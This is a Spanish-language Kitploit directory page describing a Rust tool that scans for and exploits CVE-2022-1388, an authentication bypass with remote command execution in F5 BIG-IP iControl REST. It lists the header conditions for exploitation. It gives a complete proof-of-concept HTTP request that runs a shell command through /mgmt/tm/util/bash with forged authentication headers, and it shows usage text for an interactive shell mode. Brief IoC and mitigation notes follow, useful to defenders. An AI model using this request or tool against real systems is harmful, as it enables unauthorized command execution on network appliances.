Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2022-1388-rs — CVE-2022-1388 F5 BIG-IP iControl REST Auth Bypass RCE escrito en Rust | Kitploit
Herramientas/GitHubGitHub/aancw/cve-2022-1388-rs
Escáneres de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónComando y ControlRed Teaming
GitHubaancw/cve-2022-1388-rs

CVE-2022-1388-rs

CVE-2022-1388 F5 BIG-IP iControl REST Auth Bypass RCE escrito en Rust

Ver Repositorio
25hace 4 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2022-1388-rs

Escáner y shell interactivo para CVE-2022-1388 F5 BIG-IP iControl REST Auth Bypass RCE escrito en Rust

Resumen

Para resumir, aquí hay una visión general de las condiciones necesarias de una solicitud para explotar esta vulnerabilidad:

  • El encabezado Connection debe incluir X-F5-Auth-Token
  • El encabezado X-F5-Auth-Token debe estar presente
  • El encabezado Host debe ser localhost / 127.0.0.1 o el encabezado Connection debe incluir X-Forwarded-Host
  • El encabezado Auth debe configurarse con el nombre de usuario admin y cualquier contraseña

PoC

root@kitploit:~
POST /mgmt/tm/util/bash HTTP/1.1
Host: 127.0.0.1
Authorization: Basic YWRtaW46aG9yaXpvbjM=
X-F5-Auth-Token: thisisrandomstring
User-Agent: curl/7.82.0
Connection: X-F5-Auth-Token
Accept: */*
Content-Length: 39
{
    "command":"run",
    "utilCmdArgs":"-c id"
}

Configuración del LAB

  • Puedes encontrar el laboratorio aquí

Uso

root@kitploit:~
$ cve_2022_1308_rs -h CVE-2022-1388 PoC 1.0 Petruknisme <[email protected]> Scanner and Interactive shell for CVE-2022-1388 F5 BIG-IP iControl REST Auth Bypass RCE written in Rust USAGE: cve_2022_1388_rs [OPTIONS] --url <URL> OPTIONS: -h, --help Print help information -s, --shell This mode for accessing payload with interactive shell -u, --url <URL> F5 Big-IP target url -V, --version Print version information

Requisitos

  • Rust
  • Cargo

IoCs

Los IoCs se pueden encontrar en el archivo de registro /var/log/audit. Los comandos no reconocidos ejecutados por el endpoint mgmt/tm/util/bash deberían ser motivo de preocupación.

Mitigación

Actualice a la versión más reciente o mitigue siguiendo las instrucciones en el aviso de seguridad de F5

  • https://support.f5.com/csp/article/K23605346

Referencias

  • https://www.horizon3.ai/f5-icontrol-rest-endpoint-authentication-bypass-technical-deep-dive/
Descargar herramienta